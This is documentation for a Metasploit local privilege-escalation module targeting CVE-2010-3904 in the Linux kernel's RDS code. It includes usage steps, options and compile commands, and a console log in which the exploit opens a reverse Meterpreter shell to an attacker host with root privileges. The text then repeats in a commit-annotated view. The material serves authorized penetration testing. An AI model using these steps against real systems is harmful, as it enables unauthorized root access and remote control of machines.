documentation/modules/exploit/linux/local/rds_priv_esc.md

## Description

  This module exploits a vulnerability in the `rds_page_copy_user` function
  in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
  to execute code as `root` (CVE-2010-3904).


## Vulnerable Application

  This module has been tested successfully on:

  * Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
  * Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/rds_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)

  **COMPILE**

  Options: `Auto` `True` `False` (default: `Auto`)

  Whether the exploit should be live compiled with `gcc` on the target system,
  or uploaded as a pre-compiled binary.

  `Auto` will first determine if `gcc` is installed to compile live on the system,
  and fall back to uploading a pre-compiled binary.


## Compiled Executables

The module makes use of two pre-compiled exploit executables (`rds.x86` and `rds.x64`),
to be use when `gcc` is not available on the target host for live compiling, or
`COMPILE` is set to `False`.

The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar.xz):

```bash
./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c
```


## Scenarios

  ```
  msf5 > use exploit/linux/local/rds_priv_esc
  msf5 exploit(linux/local/rds_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(linux/local/rds_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
  [*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.149
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
  [+] Deleted /tmp/.zEAOL.c
  [+] Deleted /tmp/.zEAOL
  [+] Deleted /tmp/.kBTWC7E

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.149
  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```
Add documentation 2018-05-03 13:00:01 +00:00			`## Description`

			This module exploits a vulnerability in the `rds_page_copy_user` function
			in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
			to execute code as `root` (CVE-2010-3904).


			`## Vulnerable Application`

			`This module has been tested successfully on:`

			`* Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE`
			`* Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic`


			`## Verification Steps`

			1. Start `msfconsole`
			`2. Get a session`
			3. `use exploit/linux/local/rds_priv_esc`
			4. `set SESSION [SESSION]`
			5. `check`
			6. `run`
			`7. You should get a new root session`


			`## Options`

			`SESSION`

			Which session to use, which can be viewed with `sessions`

			`WritableDir`

			A writable directory file system path. (default: `/tmp`)

			`COMPILE`

			Options: `Auto` `True` `False` (default: `Auto`)

			Whether the exploit should be live compiled with `gcc` on the target system,
			`or uploaded as a pre-compiled binary.`

			`Auto` will first determine if `gcc` is installed to compile live on the system,
			`and fall back to uploading a pre-compiled binary.`


Add compilation instructions to documentation 2018-05-18 22:10:47 +10:00			`## Compiled Executables`

			The module makes use of two pre-compiled exploit executables (`rds.x86` and `rds.x64`),
			to be use when `gcc` is not available on the target host for live compiling, or
			`COMPILE` is set to `False`.

			`The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar.xz):`

			```bash
			`./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c`
			`./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c`
			```


Add documentation 2018-05-03 13:00:01 +00:00			`## Scenarios`

			```
			`msf5 > use exploit/linux/local/rds_priv_esc`
			`msf5 exploit(linux/local/rds_priv_esc) > set session 1`
			`session => 1`
			`msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188`
			`lhost => 172.16.191.188`
			`msf5 exploit(linux/local/rds_priv_esc) > run`

			`[*] Started reverse TCP handler on 172.16.191.188:4444`
			`[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...`
			`[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...`
			`[*] Launching exploit...`
			`[*] Sending stage (853256 bytes) to 172.16.191.149`
			`[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400`
			`[+] Deleted /tmp/.zEAOL.c`
			`[+] Deleted /tmp/.zEAOL`
			`[+] Deleted /tmp/.kBTWC7E`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 172.16.191.149`
			`OS : Ubuntu 10.04 (Linux 2.6.32-21-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			`meterpreter >`
			```